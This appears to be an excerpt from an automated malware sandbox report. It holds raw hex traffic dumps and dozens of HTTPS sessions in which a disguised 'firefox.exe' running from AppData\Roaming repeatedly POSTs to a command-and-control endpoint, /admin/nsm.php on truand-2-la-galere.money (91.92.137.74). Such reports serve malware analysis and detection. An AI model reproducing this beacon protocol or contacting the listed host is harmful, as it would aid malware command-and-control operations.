2018-05-07 12:49:54 UTC384INData Raw: 44 3c 0c 74 dc 36 fd 39 1e ba 29 72 bc 43 3e 34 ee 26 6c bb fc 6e 8c c4 39 0f cc cb 8d 72 9c 46 34 73 53 61 8b a1 62 6b 6a df 2c 25 b4 58 5d 38 b2 f1 61 66 5f c8 f6 5e 64 34 0e 26 6e 60 2e 38 21 b4 00 fd 27 bd 94 d9 f9 63 20 ec 62 59 27 75 b2 6c 20 8c 42 34 2c 39 b2 f5 4c ed 42 24 dd 3b 66 e3 6c b9 2b b9 27 d0 cd 08 cc 14 99 6f e8 64 c4 63 3e 8d 57 7b 30 e5 a1 61 9a 8c 18 b6 34 dd 24 b1 37 61 b5 4e ea b7 ce 20 8c 0b 89 62 45 b3 6c d4 33 7c e6 3b 88 b0 17 6a 39 39 17 3f 62 3a 39 41 75 0e 38 34 5d b9 f0 b0 13 4d df b8 95 35 67 a8 3b 66 63 ab a7 6d b2 24 df b7 8a 76 e3 67 63 50 e2 65 58 fa eb 38 cb bd 3b 90 34 bd 6a c9 b8 6c 98 69 b3 34 49 35 65 63 ef 75 30 5b 44 61 3d 3b b7 47 e6 33 6c 87 30 73 ba 8f 17 6f 35 6a b7 36 68 e4 32 b7 dd 1d 45 39 2e 76 7d 3b b3
Data Ascii: D<t69)rC>4&ln9rF4sSabkj,%X]8af_^d4&n`.8!'c bY'ul B4,9LB$;fl+'odc>W{0a4$7aN bEl3|;j99?b:9Au84]M5g;fcm$vgcPeX8;4jli4I5ecu0[Da=;G3l0so5j6h2E9.v};
2018-05-07 12:49:54 UTC400INData Raw: 63 8c 39 98 c7 32 d6 92 34 6f b3 21 7d 33 65 a5 37 38 a6 60 3c 72 0c 4c 11 cd 18 bc dc 35 d7 34 18 25 64 0b ea ef 60 26 01 64 35 34 69 a3 a1 b2 f2 65 b4 69 63 0b 59 28 cf bd 33 80 4b 34 22 b2 f9 1a b7 ed 6a d0 36 be 79 7a ec 21 79 ef 78 38 33 0f 6e c8 18 d9 e3 09 30 63 4c 6d e6 cf 1c 61 f5 3c 26 9b 34 a5 3d 74 c5 f7 20 66 36 23 37 cb 20 93 ef 7d 38 92 e7 7d cd 2c 08 73 6e 02 6c bd 20 4b c6 05 22 bb 79 81 b1 a1 16 70 92 e5 26 39 41 68 3d 3f 06 b6 33 45 26 32 85 68 c0 94 23 1a 29 75 93 0f ed 2e 17 4f 63 43 bf f2 c7 c3 9d 74 16 41 17 34 17 bf 37 47 b9 cd 8c f7 f7 1e 67 b9 d6 22 72 f0 d0 9e ff ea 1b 41 26 f4 4f 26 e7 25 58 d7 18 6b 9f 39 60 56 c5 72 64 8f 64 12 cb 39 bc 7c 98 37 97 bf 3e cb 14 6b 44 05 45 a3 0c 5a c9 05 7b c2 12 24 77 32 41 44 d1 77 a9 29 61
Data Ascii: c924o!}3e78`<rL54%d`&d54ieicY(3K4"j6yz!yx83n0cLma<&4=t f6#7 }8},snl K"yp&9Ah=?3E&2h#)u.OcCtA47Gg"rA&O&%Xk9`Vrdd9|7>kDEZ{$w2ADw)a
2018-05-07 12:49:54 UTC416INData Raw: 3a 20 8e 34 5e 27 15 ac 20 61 65 76 34 26 22 3c ee 2c 8c 18 63 2f a8 b3 76 1c 3f bd 2b d6 6c 3b f0 66 5f e4 e3 71 60 e5 33 dd 99 91 b6 2d fe 69 28 02 ad e6 32 d3 97 54 c1 83 08 ac 67 a6 16 3e e1 d5 33 6b 62 84 63 67 fc d2 39 54 64 ed 52 62 17 06 61 b8 2d 08 30 a4 a9 e3 67 52 30 fc dd be 82 42 56 29 6a 0b 56 98 d6 54 01 65 d9 f7 62 31 b3 a0 dd 36 09 73 89 81 70 e7 42 b4 34 63 64 53 77 70 77 2f 36 64 34 5e 2c e8 11 f0 b3 6d fd 98 12 dc a8 d4 66 46 eb d8 60 80 33 64 f3 1e e1 a6 e7 63 35 0c a6 71 e3 1e 2b d0 66 2c dc fb d5 6c 61 4d 34 fa 2f 23 61 48 00 b6 83 35 8f 4d 2c 11 a3 a2 38 d4 5a 4b c5 8e d2 d0 66 eb 89 34 64 51 ac 31 64 66 dc e6 36 bf 3e 87 ef 7d c4 51 ad 38 d1 d7 93 ca 99 bd 16 c9 10 e8 67 61 e8 f1 62 ed db e7 67 64 08 cb 41 fd ba 44 98 ed 37 ec 5c
Data Ascii: : 4^' aev4&"<,c/v?+l;f_q`3-i(2Tg>3kbcg9TdRba-0gR0BV)jVTeb16spB4cdSwpw/6d4^,mfF`3dc5q+f,laM4/#aH5M,8ZKf4dQ1df6>}Q8gabgdAD7\
2018-05-07 12:49:54 UTC432INData Raw: 38 af 32 be 67 74 03 c1 f2 ed 78 65 93 7b 61 65 66 36 dd 65 d9 34 d8 39 19 af 65 33 f7 35 6c f6 f6 71 64 7a 63 a2 10 61 3b 63 33 f7 12 75 66 73 3a 45 7b 64 d3 39 6c 64 4a 71 be 40 9b e2 13 b5 30 d8 a4 ef 24 94 34 01 67 5e 65 79 b5 4e a6 59 b1 c4 33 fa a4 37 36 33 3a a3 b0 7d 6f 38 fb a5 ae f5 fa 04 35 8c 37 39 c8 30 3d 64 7e 34 23 75 a7 47 b6 39 1c 60 da 7a 33 74 31 36 27 39 40 33 4f 62 1e 67 63 1a 62 29 32 0b 64 5a 36 1c 6f 3b c9 e9 40 51 e1 a7 ad 35 e5 52 66 09 3a 72 66 54 fd 7c 33 83 66 5f 62 14 32 6f 3b 67 15 79 29 30 31 aa 67 94 34 1c 07 3b 01 f1 a5 3a 77 f5 75 36 4f 2b a4 1b 65 20 25 a6 fb 8c de 34 ee 02 61 1e 70 63 31 67 f1 79 64 25 64 34 ff 65 e6 34 f6 17 99 31 64 c3 36 82 35 33 67 d5 6e 3b ef f1 a4 ee 70 6c 31 11 67 36 50 33 cf 62 d3 65 06 38 e2
Data Ascii: 82gtxe{aef6e49e35lqdzca;c3ufs:E{d9ldJq@0$4g^eyNY3763:}o85790=d~4#uG9`z3t16'9@3Obgcb)2dZ6o;@Q5Rf:rfT|3f_b2o;gy)01g4;:wu6O+e %4apc1gyd%d4e41d653gn;pl1g6P3be8
2018-05-07 12:49:54 UTC448INData Raw: 13 11 20 17 e3 43 67 44 5f 54 07 d7 7f 14 55 06 3c c1 24 38 4d 0c 55 42 0a 5a 5a 24 08 40 02 5d 50 24 1c 16 4e 2d 11 0d 73 0b 43 94 60 51 43 50 31 5d 15 15 68 34 13 47 39 42 c1 38 38 2d 17 7d 88 bd 13 04 e6 4e 46 49 10 4b 1c 10 c3 31 4a 65 1e 5e 36 2f 5a 96 63 39 1c f2 e5 0c 47 24 64 51 06 0c e4 73 c8 f3 6d c8 0f 52 41 35 3c 16 05 43 5f 03 54 45 34 78 2e c6 b8 25 60 64 54 34 77 19 11 31 00 f7 01 25 13 30 09 0f 96 50 1d 43 4a 09 0c a4 54 34 66 1b 93 35 15 10 ca 67 62 c9 6b 08 59 11 56 5c 83 8c 37 61 31 31 64 00 58 46 53 34 0c 04 0a 18 53 07 1d 18 39 57 5c 5a 15 42 11 50 59 63 57 11 43 5f 03 0c 5f 51 64 00 34 48 76 69 78 11 07 07 35 58 36 04 45 14 0d 4c 50 42 64 5e 50 5a 52 58 0f 4c 06 31 54 43 49 17 06 49 03 17 32 34 76 17 40 55 43 5c 5c 54 70 08 43 34 6a
Data Ascii: CgD_TU<$8MUBZZ$@]P$N-sC`QCP1]h4G9B88-}NFIK1Je^6/Zc9G$dQsmRA5<C_TE4x.%`dT4w1%0PCJT4f5gbkYV\7a11dXFS4S9W\ZBPYcWC__Qd4Hvix5X6ELPBd^PZRXL1TCII24v@UC\\TpC4j
2018-05-07 12:49:54 UTC464INData Raw: 31 cb 52 74 99 f0 39 d3 2c 82 29 1a 02 39 83 6b d1 2a 86 5a 55 2b 56 35 d4 37 f0 66 54 15 c9 81 1e 6b 9b b4 bc 3c 78 da 36 6b 40 44 99 57 7c c1 06 d1 d6 9a 82 6b 83 7a 52 34 07 2a 34 cb 82 08 ce 46 b8 8a c8 35 d7 55 71 c3 a2 c7 33 26 31 28 c6 30 74 5a 84 42 08 52 7a e3 c6 9a f7 29 9d 96 93 d4 16 85 d4 3b c0 99 74 ce 85 75 56 59 57 2a 62 82 3f d9 76 07 2b 11 42 fa cc b0 6e 64 42 ce d1 6c f7 f9 4a c6 9a ab af 0d 04 74 d5 02 56 69 50 3e 8d 69 54 d5 7b d5 e9 9c a1 77 da 42 05 28 18 b3 53 09 87 7d 02 3e d7 c6 18 9a 02 37 a1 04 2c 55 66 d1 41 05 c8 d8 13 d0 6b a5 d6 4e d7 3b 53 c2 85 c7 d9 6d 05 39 38 56 33 57 f2 c9 ff 4a 09 9c b1 be c9 5c 00 65 86 4f 4f 06 26 cb d6 17 d0 1e 85 63 d2 2b d7 34 84 ed 05 18 d9 69 67 59 08 d5 17 15 c6 f7 9c 76 5d c3 52 9a 10 b0 1a
Data Ascii: 1Rt9,)9k*ZU+V57fTk<x6k@DW|kzR4*4F5Uq3&1(0tZBRz);tuVYW*b?v+BndBlJtViP>iT{wB(S}>7,UfAkN;Sm98V3WJ\eOO&c+4igYv]R
2018-05-07 12:49:54 UTC480INData Raw: 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36
Data Ascii: 34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df746
2018-05-07 12:49:54 UTC496INData Raw: 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62
Data Ascii: 9434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9b


Session IDSource IPSource PortDestination IPDestination PortProcess
10192.168.1.814917591.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:28 UTC508OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:28 UTC508OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:28 UTC508INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:28 UTC508INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
11192.168.1.814917691.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:30 UTC508OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:30 UTC509OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:30 UTC509INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:30 UTC509INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
12192.168.1.814917791.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:32 UTC509OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:32 UTC509OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:32 UTC509INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:32 UTC509INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
13192.168.1.814917891.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:33 UTC509OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:33 UTC509OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:33 UTC509INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:33 UTC509INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
14192.168.1.814917991.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:34 UTC509OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:34 UTC509OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:35 UTC509INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:35 UTC510INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
15192.168.1.814918091.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:36 UTC510OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:36 UTC510OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:36 UTC510INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:36 UTC510INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
16192.168.1.814918191.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:37 UTC510OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:37 UTC510OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:38 UTC510INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:38 UTC510INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
17192.168.1.814918291.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:38 UTC510OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:38 UTC510OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:39 UTC510INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:39 UTC511INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
18192.168.1.814918391.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:40 UTC511OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:40 UTC511OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:40 UTC511INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:40 UTC511INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
19192.168.1.814918491.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:41 UTC511OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:41 UTC511OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:41 UTC511INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:41 UTC511INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
2192.168.1.814916591.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:49:59 UTC505OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 0
Cache-Control: no-cache
2018-05-07 12:49:59 UTC505INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:49:59 UTC506INData Raw: 32 38 0d 0a 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 0d 0a 30 0d 0a 0d 0a
Data Ascii: 289ec9be34fd447911df7464ecd88bd89434f6c10c0


Session IDSource IPSource PortDestination IPDestination PortProcess
20192.168.1.814918591.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:42 UTC511OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:42 UTC511OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:43 UTC511INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:43 UTC511INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
21192.168.1.814918691.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:44 UTC511OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:44 UTC512OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:44 UTC512INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:44 UTC512INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
22192.168.1.814918791.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:45 UTC512OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:45 UTC512OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:45 UTC512INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:45 UTC512INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
23192.168.1.814918891.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:46 UTC512OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:46 UTC512OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:47 UTC512INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:47 UTC512INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
24192.168.1.814918991.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:47 UTC512OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:47 UTC512OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:48 UTC512INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:48 UTC513INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
25192.168.1.814919091.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:49 UTC513OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:49 UTC513OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:50 UTC513INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:50 UTC513INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
26192.168.1.814919191.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:50 UTC513OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:50 UTC513OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:51 UTC513INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:51 UTC513INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
27192.168.1.814919291.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:51 UTC513OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:51 UTC513OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:52 UTC513INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:52 UTC513INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
28192.168.1.814919391.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:53 UTC513OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:53 UTC514OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:53 UTC514INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:53 UTC514INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
29192.168.1.814919491.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:54 UTC514OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:54 UTC514OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:55 UTC514INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:55 UTC514INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
3192.168.1.814916791.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:01 UTC506OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 458
Cache-Control: no-cache
